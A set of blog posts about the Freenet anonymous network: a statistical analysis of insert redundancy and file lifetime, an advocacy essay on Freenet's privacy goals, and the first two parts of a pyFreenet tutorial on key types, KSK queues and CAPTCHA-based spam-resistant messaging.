To achieve 90% retrievability, we actually need a chunk availability of 99.5%. So we might have 90% retrievability one hour after the insert.

from spielfaehig import spielfähig
return spielfähig(0.995, 101, 100)
→ 0.908655654736

Let’s check for 50%: We need a chunk probability of about 98.4%.

from spielfaehig import spielfähig
return spielfähig(0.984, 101, 100)
→ 0.518183035909

The mean lifetime of a file changed from about zero to a few hours.

3.3 50% redundancy

Now, let’s take a big step: redundancy 1.5. Now we need 71.2% block retrievability to have a 90% chance of retrieving one file.

from spielfaehig import spielfähig
return spielfähig(0.712, 150, 100)
→ 0.904577767501

For 50% retrievability we need 66.3% chunk availability.

from spielfaehig import spielfähig
return spielfähig(0.663, 150, 100)
→ 0.500313163333

66% would be reached in the current network after about 20 days (between 2 weeks and 4 weeks), and in a zero-redundancy network after 40 days (fetch-pull-stats).

At the same time, though, the chunk replacement rate increased by 50%, so the mean chunk lifetime decreased by factor 2/3. So the lifetime of a file would be 4 weeks.

3.4 Generalize this

So, now we have calculations for redundancy 1, 1.5, 2 and 3. Let’s see if we can find a general (if approximate) rule for redundancy.

From the fetch-pull-graph from digger3 we see empirically, that between one week and 18 weeks each doubling of the lifetime corresponds to a reduction of the chunk retrieval probability of 15% to 20%.

Also we know that 50% probability corresponds to 4 weeks lifetime.

And we know that redundancy x has a minimum required chunk probability of 1/x.

With this, we can model the required chunk lifetime as a function of redundancy:

chunk lifetime = 4 * 2**((0.5-1/x)/0.2)

with x as redundancy. Note: this function is purely empirical and approximate.

Having the chunk lifetime, we can now model the lifetime of a file as a function of its redundancy:

file lifetime = (2/x) * 4 * (2**((0.5-1/x)/0.2))

We can now use this function to find an optimum of the redundancy if we are only concerned about file lifetime. Naturally we could get the trusty wxmaxima and get the derivative of it to find the maximum. But that is not installed right now, and my skills in getting the derivatives by hand are a bit rusty (note: install running). So we just do it graphically. The function is not perfectly exact anyway, so the errors introduced by the graphic solution should not be too big compared to the errors in the model.
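
Before plotting we can sanity-check the model numerically (a small sketch; lifetimes in weeks):

# Sketch: evaluate the empirical file-lifetime model for a few redundancies.
def file_lifetime_weeks(x):
    return (2.0 / x) * 4 * 2 ** ((0.5 - 1.0 / x) / 0.2)

for x in (2, 3, 3.5, 4, 6):
    print(x, round(file_lifetime_weeks(x), 2))
# -> roughly 4.0, 4.75, 4.8, 4.76, 4.23: the maximum sits around
#    redundancy 3-4 and lies not quite a week above the current 4 weeks.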

Note however, that this model is only valid in the range between 20% and 90% chunk retrieval probability, because the approximation for the chunk lifetime does not hold anymore for values above that. Due to this, redundancy values close to or below 1 won’t be correct.

Also keep in mind that it does not include the effect due to the higher rate of removing dead space - which is space that belongs to files which cannot be recovered anymore. This should mitigate the higher storage requirement of higher redundancy.

# encoding: utf-8
plotcmd = """
set term png
set width 15
set xlabel "redundancy"
set ylabel "lifetime [weeks]"
set output "freenet-prob-function.png"
set xrange [0:10]
plot (2/x) * 4 * (2**((0.5-1/x)/0.2))
"""
with open("plot.pyx", "w") as f:...

from subprocess import Popen
Popen(["pyxplot", "plot.pyx"])

4 Summary: Merit and outlook

Now, what do we make of this?

First off: If the equations are correct, an increase in redundancy would improve the lifetime of files by a maximum of almost a week. Going further reduces the lifetime, because the increased replacement of old data outpaces the improvement due to the higher redundancy.

Also higher redundancy needs a higher storage capacity, which reduces the overall capacity of freenet. This should be partially offset by the faster purging of dead storage space.

The results support an increase in redundancy from 2 to 3, but not to 4.

Well, and aren’t statistics great? :)

Additional notes: This exploration ignores:

  • healing creates less insert traffic than new inserts by only inserting failed segments, and it makes files which get accessed regularly live much longer,
  • inter-segment redundancy improves the retrieving of files, so they can cope with a retrievability of 50% of any chunks of the file, even if the distribution might be skewed for a single segment,
  • Non-uniformity of the network which makes it hard to model effects with global-style math like this,
  • Separate stores for SSK and CHK keys, which improve the availability of small websites and
  • Usability and security impact of increased insert times (might be reduced by only inserting 2/3rd of the file data and letting healing do the rest when the first downloader gets the file)

Due to that, the findings can only provide clues for improvements, but cannot perfectly predict the best path of action. Thanks to evanb for pointing them out!

If you are interested in other applications of the same theory, you might enjoy my text Statistical constraints for the design of roleplaying games (RPGs) and campaigns (german original: Statistische Zwänge beim Rollenspiel- und Kampagnendesign). The script spielfaehig.py I used for the calculations was written for a forum discussion which evolved into that text :)

This text was written and checked in emacs org-mode and exported to HTML via `org-export-as-html-to-buffer`. The process integrated research and documentation. In hindsight, that was a pretty awesome experience, especially the inline script evaluation. I also attached the org-mode file for your leisure :)

Attachments:
freenet-prob-redundancy-2.png (67.05 KB)
freenet-prob-redundancy-3.png (65.67 KB)
freenet-prob-redundancy-4.png (63.43 KB)
freenet-success-probability.org (14.84 KB)
freenet-prob-function.png (20.5 KB)
fetch_dates_graph-2012-03-16.png (17.25 KB)
spielfaehig.py.txt (1.15 KB)

Freenet / Hyphanet: The forgotten cypherpunk paradise

PDF

PDF (to print)

Org (source)

Text (for email)

A long time ago in a chatroom far away, select groups of crypto-anarchists gathered to discuss the death of privacy since the NSA could spy on all communications with ease. Among those who proposed technical solutions was a student who later published the widely regarded first paper on Freenet: A decentralized anonymous datastore which was meant to be a cypherpunk paradise: true censorship resistance, no central authority and long lifetime only for information which people were actually interested in.

Many years passed, two towers fell, the empire expanded its hunt for rebels all over the globe, and now, as the empire’s grip has become so horrid that even the most loyal servants of the emperors turn against them and expose their dark secrets to the masses, Freenet is still moving forward. Lost to the eye of the public, Freenet shaped and reshaped itself - all the while maintaining its focus to provide true freedom of the press in the internet.

A new old hope

Once only a way to anonymously publish one-shot websites that other members of the group could see, Freenet now provides its users with most services found in the normal internet, yet safe from the prying eyes of the empire. Its users communicate with each other using email which hides metadata, micro-blogging with real anonymity, forums on a wide number of topics - from politics to drug-experiences - and websites with update-notifications (howto) and streaming media (howto) whose topics span from music and anime over religion and programming to life without a state, spaceflight and news feeds.

All these possibilities emerge from its decentralized datastore and the tools built on top of a practically immutable data structure, and all its goals emerge from providing real freedom of the press. Decentralization is required to avoid providing a central place for censorship. Anonymity is needed to protect people against censorship by threat of subsequent punishment, prominently used in China where it is only illegal to write something against the state if too many people should happen to read it. Private communication is needed to allow whistleblowers to contact journalists and also to discuss articles before publication, invisible access to information makes it hard to censor articles by making everyone a suspect who reads one of those articles, as practiced by the NSA which puts everyone on the watchlist who accesses freenetproject.org or the Linux Journal (reported by german public TV program Panorama). And all this has to be convenient enough that journalists can actually use it during their quite stressful daily work. As side effect it provides true online freedom, because if something is safe enough for a whistleblower, it is likely safe enough for most other communication, too.

These goals pushed Freenet development into areas which other groups only touched much later - or not at all. And except for convenience, which is much harder to get right in a privacy-sensitive context than it seems, Freenet nowadays manages to fulfill these goals very well.

The empire strikes the web

The cloud was “invented” and found to be unsafe, yet Freenet already provided its users with a safe cloud. Email was found to spill all your secrets, while Freenet already provided its users with privacy preserving emails. Disaster control became all the rage after hurricane Katrina and researchers scrambled to find solutions for communicating on restricted routes, and Freenet already provided a globally connectable darknet on friend-to-friend connections. Blogs drowned in spam comments and most caved in and switched to centralized commenting solutions, which made the fabled blogosphere into little more than a PR outlet for Facebook, but Freenet already provided spam resistance via an actually working web of trust - after seeing the non-spam-resistant forum system Frost burn when some trolls realized that true anonymity also means complete freedom to use spam-bots. Censorship and total surveillance of user behavior on Facebook were exposed, G+ required users to use their real names and Twitter got blocked in many repressive regimes, whereas Freenet already provided hackers with convenient, decentralized, anonymous micro-blogging. Now websites are cracked by the minute and constant attacks made it a chore for private webmasters simply to stay available, though Freenet already offers attack-resistant hosting which stays online as long as people are interested in the content.

All these developments happened in a private microcosmos, where new and strange ideas could form and hatch, an incubator where reality could be rethought and rewritten to reestablish privacy in the internet. The internet was hit hard, and Freenet evolved to provide a refuge for those who could use it.

The return of privacy

What started as the idea of a student was driven forward by about a dozen free-time coders and one paid developer for more than a decade - funded by donations from countless individuals - and turned into a true forgotten cryptopunk paradise: actual working solutions to seemingly impossible problems, highly detailed documentation streams in a vast nothingness to be explored only by the initiated (where RTFS is a common answer: Read The Friendly Source), all this with plans and discussions about saving the world mixed in.

The practical capabilities of Freenet should be known to every cryptopunk - but a combination of mediocre user experience, bad communication and worse PR (and maybe something more sinister, if Poul-Henning Kamp should prove to be farsighted about project Orchestra) brought us to a world where a new, fancy, half finished, partially thought through, cash-cow searching project comes around and instead of being asked “how’s that different from Freenet?”, the next time I talk to a random crypto-loving stranger about Freenet I am asked “how is Freenet different from X which just made the news?” (the answer which fits every single time is: “Even if X should work, it would provide only half of Freenet, and missing essential features - friend-to-friend darknet, access dependent content lifetime, decentralized spam resistance, stable pseudonyms, protection against forced exposure, hosting without a server”).

Now, after many years of work have culminated in a big step forward, it is time for Freenet to re-emerge from hiding and take its place as one of the few privacy tools actually proven to work - and as the single tool with the most ambitious goal: Reestablishing freedom of the press and freedom of speech in the internet.

Freenet re-awakens: Join in

If you do not have the time for large scale contribution, a good way to support freenet is to run and use it - and ask your friends to join in, ideally over darknet.

Install Freenet

More information about the movement which spawned Freenet can be found in Wikipedia under Cypherpunk.

If you can program, there are lots of low hanging fruit: small tasks which allow reaping the fruits of existing solutions to hard problems. Or, if you want to harness Freenet for your own tools, have a look at the Freenet Communication Primitives.

My recent work on freenet includes 4 hours of hacking the Python-based site uploader in pyFreenet which sped up the load time of its sites by up to a factor of 4. If you want to join, come to #freenet @ freenode to chat, discuss with us in the freenet devl mailing list and check the github-project.

Freenet Logo: Follow the Rabbit Welcome to Freenet, where no one can watch you read. → freenetproject.org

Creative Commons License

I hereby release this article under the CC attribution License: You can use the text however you like as long as you name me (Arne Babenhauserheide) and link here ( draketo.de/english/freenet/forgotten-cryptopunk-paradise or draketo.de/node/656 ).

A huge thank you goes to Lacrocivious who helped me improve this text a lot! A second thank you goes to the other Freenet users with whom I discussed the article via Darknet-messages, when we were still thinking about submitting it to Wired and therefore needed to keep it confidential.

Attachments:
2014-08-24-So-freenet-forgotten-cryptopunk-paradise.pdf (85.01 KB)
freenet-forgotten-cryptopunk-paradise-mail.txt (8.4 KB)
freenet-forgotten-cryptopunk-paradise-pdf-thumb.png (8.51 KB)
2014-08-24-So-freenet-forgotten-cryptopunk-paradise.org (7.93 KB)
freenet_logo.png (2.26 KB)

Freenet Communication Primitives: Part 1, Files and Sites

Basic building blocks for communication in Freenet.

This is a guide to using Freenet as backend for communication solutions - suitable for anything from filesharing over chat up to decentrally hosted game content like level-data. It uses the Python interface to Freenet for its examples.

TheTim, from Tim Moore, License: CC BY.

This guide consists of several installments: Part 1 (this text) is about exchanging data, Part 2 is about confidential communication and finding people and services without drowning in spam and Part 3 ties it all together by harnessing existing plugins which already include all the hard work which distinguishes a quick hack from a real-world system. Happy Hacking and welcome to Freenet, the forgotten cypherpunk paradise where no one can watch you read!

1 Introduction

The immutable datastore in Freenet provides the basic structures for implementing distributed, pseudonymous, spam-resistant communication protocols. But until now there was no practically usable documentation on how to use them. Every new developer had to find out about them by asking, speculating and second-guessing the friendly source (also known as SGTFS).

We will implement the answers using pyFreenet. Get it from http://github.com/freenet/pyFreenet

We will not go into special cases. For these, have a look at the API documentation of fcp.node.FCPNode().

1.1 Install pyFreenet

To follow the code examples in this article, install Python 2 with setuptools and then run

easy_install --user --egg pyFreenet==0.4.0

2 Sharing a File: The CHK (content hash key)

The first and simplest task is sharing a file. You all know how this works in torrents and file hosters: You generate a link and give that link to someone else.

To create that link, you have to know the exact content of the file beforehand.

import fcp
n = fcp.node.FCPNode()
key = n.put(data="Hello Friend!")
print key
n.shutdown()

Just share this key, and others can retrieve it. Use http://127.0.0.1:8888/ as prefix, and they can even click it - if they run Freenet on their local computer or have an SSH forward for port 8888.

The code above only returns once the file finished uploading. The Freenet Client Protocol (that’s what fcp stands for) however is asynchronous. When you pass async=True to n.put() or n.get(), you get a job object which gives you the result via job.wait().

To generate the key without actually uploading the file, use chkonly=True as argument to n.put().

Let’s test retrieving a file:

import fcp
n = fcp.node.FCPNode()
key = n.put(data="Hello Friend!")
mime, data, meta = n.get(key)
print data
n.shutdown()

This code anonymously uploads an invisible file into Freenet which can only be retrieved with the right key. Then it downloads the file from Freenet using the key and shows the data.

That the put and the get request happen from the same node is a mere implementation detail: They could be fired by total strangers on different sides of the globe and would still work the same. Even the performance would be similar.

Note: fcp.node.FCPNode() opens a connection to the Freenet node. You can have multiple of these connections at the same time, all tracking their own requests without interfering with each other. Just remember to call n.shutdown() on each of them to avoid getting ugly backtraces.

So that’s it. We can upload and download files, completely decentrally, anonymously and confidentially.

There’s just one caveat: We have to exchange the key. And to generate that key, we have to know the content of the file.

Let’s fix that.

3 Public/Private key publishing: The SSK (signed subspace key)

Our goal is to create a key where we can upload a file in the future. We can generate this key and tell someone else: Watch this space.

So we will generate a key, start to download from the key and insert the file to the key afterwards.

import fcp
n = fcp.node.FCPNode()
# we generate a key with the additional filename hello.
public, private = n.genkey(name="hello")
job = n.get(public, async=True)
n.put(uri=private, data="Hello Friend!")
mime, data, meta = job.wait()
print data
n.shutdown()

These 8 lines of code create a key which you could give to a friend. Your friend will start the download and when you get hold of that secret hello-file, you upload it and your friend gets it.

Hint: If you want to test whether the key you give is actually used, you can check the result of n.put(). It returns the key with which the data can be retrieved.

Using the .txt suffix makes Freenet use the mimetype text/plain. Without extension it will use application/octet-stream.

If you start downloading before you upload as we do here, you can trigger a delay of about half an hour due to overload protections (the mechanism is called “recently failed”).

Note that you can only write to a given key-filename combination once. If you try to write to it again, you’ll get conflicts – your second upload will in most cases just not work. You might recognize this from immutable data structures (without the conflict stuff). Freenet is the immutable, distributed, public/private key database you’ve been fantasizing about when you had a few glasses too many during that long night. So best polish your functional programming skills. You’re going to use them on the level of practical communication.

3.1 short roundtrip time (speed hacks)

A SSK is a special type of key, and similar to inodes in a filesystem it can carry data. But if used in the default way, it will forward to a CHK: The file is salted and then inserted to a CHK which depends on the content and then some, ensuring that the key cannot be predicted from the data (this helps avoid some attacks against your anonymity).

When we want a fast round trip time, we can cut that. The condition is that your data plus filename is less than 1KiB after compression, the amount of data a SSK can hold. And we have to get rid of the metadata. And that means: With pyFreenet use the application/octet-stream mime type, because that’s the default one, so it is left out on upload. If you use raw access to FCP, omit Metadata.ContentType or set it to "". And insert single files (we did not yet cover uploading folders: You can do that, but they will forward to a CHK).

import fcp
n = fcp.node.FCPNode()
# we generate a key with the additional filename hello.
public, private = n.genkey(name="hello.txt")
job = n.get(public, async=True, realtime=True, priority=0)
n.put(uri=private, data="Hello Friend!", mimetype="application/octet-stream", realtime=True, priority=0)
mime, data, meta = job.wait()
print public
print data
n.shutdown()

To check whether we managed to avoid the metadata, we can use the KeyUtils plugin to analyze the key.

If it is right, when putting the key into the text field on the http://127.0.0.1:8888/KeyUtils/ site, you’ll see something like this:

0000000: 4865 6C6C 6F20 4672 6965 6E64 21
         Hello Friend!

Also we want to use realtime mode (optimized for the webbrowser: reacting quickly but with low throughput) with a high priority.

Let’s look at the round trip time we achieve:

import time
import fcp
n = fcp.node.FCPNode()
# we generate two keys with the additional filename hello.
public1, private1 = n.genkey(name="hello1.txt")
public2, private2 = n.genkey(name="hello2.txt")
starttime = time.time()
job1 = n.get(public1, async=True, realtime=True, priority=1)
job2 = n.get(public2, async=True, realtime=True, priority=1)
n.put(uri=private1, data="Hello Friend!",
      mimetype="application/octet-stream",
      realtime=True, priority=1)
mime, data1, meta = job1.wait()
n.put(uri=private2, data="Hello Back!",
      mimetype="application/octet-stream",
      realtime=True, priority=1)
mime, data2, meta = job2.wait()
rtt = time.time() - starttime
n.shutdown()
print public1
print public2
print data1
print data2
print "RTT (seconds):", rtt

When I run this code, I get less than 80 seconds round trip time. Remember that we’re uploading two files anonymously into a decentralized network, discovering them and then downloading them, and all that in serial: less than a minute to detect a single upload to a known key.

80 seconds is not instantaneous, but looking at usual posting frequencies in IRC and other chat systems, it’s completely sufficient to implement a chat system. And in fact that’s how FLIP is implemented: IRC over Freenet.

Compare this to the performance when we do not use the short round trip time trick of avoiding the Metadata and using the realtime queue:

import time
import fcp
n = fcp.node.FCPNode()
# we generate two keys with the additional filename hello.
public1, private1 = n.genkey(name="hello1.txt")
public2, private2 = n.genkey(name="hello2.txt")
starttime = time.time()
job1 = n.get(public1, async=True)
job2 = n.get(public2, async=True)
n.put(uri=private1, data="Hello Friend!")
mime, data1, meta = job1.wait()
n.put(uri=private2, data="Hello Back!")
mime, data2, meta = job2.wait()
rtt = time.time() - starttime
n.shutdown()
print public1
print public2
print data1
print data2
print "RTT (seconds):", rtt

With 300 seconds (5 minutes), that’s more than 3x slower. So you see, if you have small messages and you care about latency, you want to do the latency hacks.

4 Upload Websites: SSK as directory

So now we can upload single files, but the links look a lot like what we see on websites: http://127.0.0.1:8888/folder/file. So can we just mirror a website? The answer is: Yes, definitely!

import fcp
n = fcp.node.FCPNode()
# We create a key with a directory name
public, private = n.genkey() # no filename: we need different ones
index = n.put(uri=private + "index.html",
      data='''<html>
  <head>
    <link rel="stylesheet" type="text/css" href="style.css">
    <title>First Site!</title></head>
  <body>Hello World!</body></html>''')
n.put(uri=private + "style.css", 
      data='body {color: red}\n')
print index
n.shutdown()

Now we can navigate to the key in the Freenet web interface and look at our freshly uploaded website! The text is colored red, so it uses the stylesheet. We now have files in Freenet which can reference each other by relative links.

4.1 Multiple directories below an SSK

So now we can create simple websites on an SSK. But here’s a catch: key/hello/hello.txt simply returns key/hello. What if we want multiple folders?

For this purpose, Freenet provides manifests instead of single files. Manifests are tarballs containing several files which are downloaded together; they can also include references to external files, called redirects. They can be uploaded as folders into the key. In addition to these, there are quite a few other tricks. Most of them are used in freesitemgr, which builds on fcp/sitemgr.py.

But we want to learn how to do it ourselves, so let’s do a more primitive version manually via n.putdir():

import os
import tempfile

import fcp
n = fcp.node.FCPNode()
# we create a key again. The folder of the site will be uploaded
# into it as a container, using the name given to putdir().
public, private = n.genkey()
# now we create a directory
tempdir = tempfile.mkdtemp(prefix="freesite-")
with open(os.path.join(tempdir, "index.html"), "w") as f:
    f.write('''<html>
    <head>
    <link rel="stylesheet" type="text/css" href="style.css">
    <title>First Site!</title></head>
    <body>Hello World!</body></html>''')

with open(os.path.join(tempdir, "style.css"), "w") as f:
    f.write('body {color: red}\n')

uri = n.putdir(uri=private, dir=tempdir, name="hello", 
               filebyfile=True, allatonce=True, globalqueue=True)
print uri
n.shutdown()

That’s it. We just uploaded a folder into Freenet.

But now that it’s there, how do we upload a better version? As already said, files in Freenet are immutable. So what’s the best solution if we can’t update the data, but only upload new files? The obvious solution would be to just number the site.

And this is how it was done in the days of old. People uploaded hello-1, hello-2, hello-3 and so forth, and in hello-1 they linked to an image under hello-2. When visitors of hello-1 saw that the image loaded, they knew that there was a new version.
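
A hedged sketch of that old-style versioning, simplified to single files under the SSK (the key names are just examples):

import fcp
n = fcp.node.FCPNode()
public, private = n.genkey()
# the author uploads edition 1 by hand, as in the days of old
n.put(uri=private + "hello-1", data="<html>edition 1</html>")
# a visitor probes for the next edition; if the fetch succeeds,
# a newer version exists and can be shown
try:
    print n.get(public + "hello-2", timeout=60)[1]
except Exception:
    print "no newer edition yet"
n.shutdown()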

When more and more people adopted that, Freenet added core support: USKs, the updatable subspace keys.

We will come to that in the next part of this series: Service Discovery and Communication.


Freenet Communication Primitives: Part 2, Service Discovery and Communication

Basic building blocks for communication in Freenet.

This is a guide to using Freenet as backend for communication solutions - suitable for anything from filesharing over chat up to decentrally hosted game content like level-data. It uses the Python interface to Freenet for its examples.

Mirror, Freenet Project, Arne Babenhauserheide, License: GPL

This guide consists of several installments: Part 1 is about exchanging data, Part 2 is about confidential communication and finding people and services without drowning in spam and Part 3 ties it all together by harnessing existing plugins which already include all the hard work which distinguishes a quick hack from a real-world system (this is currently a work in progress, implemented in babcom_cli which provides real-world usable functionality).

Note: You need the current release of pyFreenet for the examples in this article (0.4.0). Get it from PyPI:

# with setuptools
easy_install --user --egg pyFreenet==0.4.0
# or pip
pip install --user --egg pyFreenet==0.4.0

This is part 2: Service Discovery and Communication. It shows how to find new people, build secure communication channels and create community forums. Back when I contributed to Gnutella, this was the holy grail of many p2p researchers (I still remember the service discovery papers). Here we’ll build it in 300 lines of Python.

Welcome to Freenet, where no one can watch you read!

USK: The Updatable Subspace Key

USKs allow uploading increasing versions of a website into Freenet. Like the numbered uploads from the previous article they simply add a number to the site, but they automate upload and discovery of new versions in roughly constant time (using Date Hints and automatic checking for new versions), and they allow accessing a site as <key>/<name>/<minimal version>/ (never underestimate the impact of convenience!).

With this, we only need a single link to provide an arbitrary number of files, and it is easy and fast to always get the most current version of a site. This is the ideal way to share a website in Freenet. Let’s do it practically.

import os
import tempfile

import fcp
n = fcp.node.FCPNode()
# we create a key again. The folder of the site will be uploaded
# into it as a container, using the name given to putdir().
public, private = n.genkey()
# now we create a directory
tempdir = tempfile.mkdtemp(prefix="freesite-")
with open(os.path.join(tempdir, "index.html"), "w") as f:
    f.write('''<html>
    <head>
    <link rel="stylesheet" type="text/css" href="style.css">
    <title>First Site!</title></head>
    <body>Hello World!</body></html>''')

with open(os.path.join(tempdir, "style.css"), "w") as f:
    f.write('body {color: red}\n')

uri = n.putdir(uri=private, dir=tempdir, name="hello",
               filebyfile=True, allatonce=True, globalqueue=True,
               usk=True)
print uri
n.shutdown()
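
To use the versioned access pattern mentioned above, we can ask for the newest edition by requesting version -1 (a hedged sketch; the placeholder stands for the USK printed by the upload above, and the exact path layout is an assumption):

import fcp
n = fcp.node.FCPNode()
# placeholder: the USK printed by the upload above, e.g. USK@<hashes>/hello/0/
uri = "USK@.../hello/0/"
# replacing the edition number with -1 asks for the latest known edition
latest = uri.rsplit("/", 2)[0] + "/-1/"
mime, data, meta = n.get(latest + "index.html", followRedirect=True)
print data
n.shutdown()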

But we still have to share the public key first, so we cannot just tell someone where to upload files so that we will see them. If we shared the private key instead, someone else could upload there and we would see the result under the public key. We could not be sure who uploaded it, but at least we would get the files. Maybe we could even derive both keys from a single value… and naturally we can. This is called a KSK (old description).

KSK: Upload a file to a password

KSKs allow uploading a file to a pre-determined password. The file will only be detectable for those who know the password, so we have effortless, invisible, password protected files.

import fcp
import uuid # avoid spamming the global namespace

n = fcp.node.FCPNode()
_uuid = str(uuid.uuid1())
key = "KSK@" + _uuid
n.put(uri=key, data="Hello World!",
      Global=True, persistence="forever",
      realtime=True, priority=1)
print key
print n.get(key)[1]
n.shutdown()

Note: We’re now writing a communication protocol, so we’ll always use realtime mode. Be aware, though, that realtime is rate limited. If you use it for large amounts of data, other nodes will slow down your requests to preserve quick reaction of the realtime queue for all (other) Freenet users.

Note: Global=True and persistence="forever" tell Freenet to take over the upload so that you can shut down the script. Use async=True and waituntilsent=True to just start the upload: when the function returns you can safely exit from the script and let Freenet upload the file in the background; if necessary it will even keep uploading over restarts. And yes, the capitalized Global looks crazy. For pyFreenet that choice is sane (though not beautiful), because Global gets used directly as a parameter in the Freenet Client Protocol (FCP). This is the case for many of the function arguments. In putdir() there’s a globalqueue parameter which also sets persistence; that should become part of the put() API, but isn’t yet. There are lots of places where pyFreenet is sane, but not beautiful. Maybe that is its secret for keeping on working from 2008 till 2014 with almost no maintenance.
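
A minimal sketch of that fire-and-forget pattern (the key name is just an example):

import fcp
n = fcp.node.FCPNode()
public, private = n.genkey(name="background.txt")
# hand the upload to the node and return as soon as the data
# has been sent to it; the node keeps inserting in the background
n.put(uri=private, data="data we do not want to wait for",
      async=True, waituntilsent=True,
      Global=True, persistence="forever")
print public
n.shutdown()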

For our purposes the main feature of KSKs is that we can tell someone to upload to an arbitrary phrase and then download that.

If we add a number, we can even hand out a password to multiple people and tell them to just upload to the first unused version. This is called the KSK queue.

KSK queue: Share files by uploading to a password

The KSK queue used to be the mechanism of choice to find new posts in forums, until spammers proved that real anonymity means total freedom to spam: they burned down the Frost Forum System. But we’ll build this, since it provides a basic building block for the spam-resistant system used in Freenet today.

Let’s just do it in code (descriptions are in the comments):

import fcp
import uuid # avoid spamming the global namespace

n = fcp.node.FCPNode()
_uuid = str(uuid.uuid1())
print "Hey, this is the password:", _uuid
# someone else used it before us
for number in range(2):
    key = "KSK@" + _uuid + "-" + str(number)
    n.put(uri=key, data="Hello World!", 
          Global=True, persistence="forever",
          realtime=True, priority=1,
          timeout=360) # 6 minutes
# we test for a free slot
for number in range(4):
  key = "KSK@" + _uuid + "-" + str(number)
  try:
    n.get(key, 
          realtime=True, priority=1, 
          timeout=60)
  except fcp.node.FCPNodeTimeout:
    break
# and write there
n.put(uri=key, data="Hello World!",
      Global=True, persistence="forever",
      realtime=True, priority=1,
      timeout=360) # 6 minutes
print key
print n.get(key)[1]
n.shutdown()

Note that currently a colliding put – uploading where someone else uploaded before – simply stalls forever instead of failing. This is a bug in pyFreenet. We work around it by giving an explicit timeout.

But it’s clear how this can be spammed.

And it might already become obvious how this can be avoided.

KSK queue with CAPTCHA

Let’s assume I do not tell you a password. Instead I tell you where to find a riddle. The solution to that riddle is the password. Now only those who are able to solve riddles can upload there. And each riddle can be used only once. This restricts automated spamming, because it requires an activity which we hope only humans can do reliably.

In the clearweb this is known as CAPTCHA. For the examples in this guide a plain text version is much easier.

import fcp
import uuid # avoid spamming the global namespace

n = fcp.node.FCPNode()
_uuid = str(uuid.uuid1())
_uuid2 = str(uuid.uuid1())
riddlekey = "KSK@" + _uuid
riddle =  """
What goes on four legs in the morning,                          
two legs at noon, and three legs in the                         
evening?
A <answer>
"""
# The ancient riddle of the sphinx
n.put(uri=riddlekey, data="""To reach me, answer this riddle.

%s

Upload your file to %s-<answer>
""" % (riddle, _uuid2),
      Global=True, persistence="forever",
      realtime=True, priority=1)

print n.get(riddlekey, realtime=True, priority=1)[1]
answer = "human"
print "answer:", answer
answerkey = "KSK@" + _uuid2 + "-%s" % answer

n.put(uri=answerkey, data="Hey, it's me!",
      Global=True, persistence="forever",
      realtime=True, priority=1)

print n.get(answerkey, realtime=True, priority=1)[1]
n.shutdown()

Now we have fully decentralized, spam-resistant, anonymous communication.

Let me repeat that: fully decentralized, spam-resistant, anonymous communication.

The need to solve a riddle every time we want to write is not really convenient, but it provides the core of the feature we need. Everything we add now just makes this more convenient and makes it scale for many-to-many communication.

(Originally I wanted to use the Hobbit riddles for this, but I switched to the sphinx riddle to avoid the swamp of multinational (and especially German) quoting restrictions.)

Convenience: KSK queue with CAPTCHA via USK to reference a USK

The first step to improve this is getting rid of the requirement to solve a riddle every single time we write to a person. The second is to automatically update the list of riddles.

For the first, we simply upload a public USK key instead of the message. That gives a potentially constant stream of messages.

For the second, we upload the riddles to a USK instead of to a KSK. We pass out this USK instead of a password. Let’s realize this.

To make this easier, let’s use names: Alice wants to contact Bob, and Bob gave her his USK. The answer-uuid we’ll call the namespace.

import fcp
import uuid # avoid spamming the global namespace
import time # to check the timing

tstart = time.time()
def elapsed_time():
    return time.time() - tstart


n = fcp.node.FCPNode()

bob_public, bob_private = n.genkey(usk=True, name="riddles")
alice_to_bob_public, alice_to_bob_private = n.genkey(usk=True, name="messages")
namespace_bob = str(uuid.uuid1())
riddle =  """
What goes on four legs in the morning,                          
two legs at noon, and three legs in the                         
evening?
A <answer>
"""
print "prepared:", elapsed_time()
# Bob uploads the ancient riddle of the sphinx
put_riddle = n.put(uri=bob_private,
                   data="""To reach me, answer this riddle.

%s

Upload your key to %s-<answer>
""" % (riddle, namespace_bob),
                   Global=True, persistence="forever",
                   realtime=True, priority=1, async=True,
                   IgnoreUSKDatehints="true") # speed hack for USKs.

riddlekey = bob_public
print "riddlekey:", riddlekey
print "time:", elapsed_time()
# Bob shares the riddlekey. We're set up.

# Alice can insert the message before telling Bob about it.
put_first_message = n.put(uri=alice_to_bob_private,
                          data="Hey Bob, it's me, Alice!",
                          Global=True, persistence="forever",
                          realtime=True, priority=1, async=True,
                          IgnoreUSKDatehints="true")

print "riddle:", n.get(riddlekey, realtime=True, priority=1, followRedirect=True)[1]
print "time:", elapsed_time()

answer = "human"
print "answer:", answer
answerkey = "KSK@" + namespace_bob + "-%s" % answer
put_answer = n.put(uri=answerkey, data=alice_to_bob_public,
                   Global=True, persistence="forever",
                   realtime=True, priority=1, async=True)

print ":", elapsed_time()
# Bob gets the messagekey and uses it to retrieve the message from Alice

# Due to details in the insert process (i.e. ensuring that the file is
# accessible), the upload does not need to be completed for Bob to be
# able to get it. We just try to get it.
messagekey_alice_to_bob = n.get(answerkey, realtime=True, priority=1)[1]

print "message:", n.get(uri=messagekey_alice_to_bob, realtime=True, priority=1,
                        followRedirect=True, # get the new version
                        )[1]

print "time:", elapsed_time()
# that's it. Now Alice can upload further messages which Bob will see.

# Bob starts listening for a more recent message. Note that this does
# not guarantee that he will see all messages.
def next_usk_version(uri):
    elements = uri.split("/")
    elements[2] = str(abs(int(elements[2])) + 1)
    # USK@.../name/N+1/...
    return "/".join(elements)

next_message_from_alice = n.get(
    uri=next_usk_version(messagekey_alice_to_bob),
    realtime=True, priority=1, async=True,
    followRedirect=True) # get the new version

print "time:", elapsed_time()
# Alice uploads the next version.
put_second_message = n.put(uri=next_usk_version(alice_to_bob_private),
                           data="Me again!",
                           Global=True, persistence="forever",
                           realtime=True, priority=1,
                           IgnoreUSKDatehints="true",
                           async=True)

# Bob sees it.
print "second message:", next_message_from_alice.wait()[1]
print "time:", elapsed_time()

print "waiting for inserts to finish"
put_riddle.wait()
put_answer.wait()
put_first_message.wait()
put_second_message.wait()
print "time:", elapsed_time()

n.shutdown()

From start to end this takes less than two minutes, and now Alice can send Bob messages with roughly one minute delay.

So now we have set up a convenient communication channel. Since Alice already knows Bob’s key, Bob could simply publish a bob-to-alice public key there, and if both publish GnuPG keys, those keys can be hidden from others: instead of uploading the plain key, Alice encrypts the key to Bob, and Bob encrypts his bob-to-alice key using the GnuPG key from Alice. By regularly sending themselves new public keys, they could even establish perfect forward secrecy. I won’t implement that here, because when we get to the third part of this series, we will simply use the Freemail and Web of Trust plugins which already provide these features.
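
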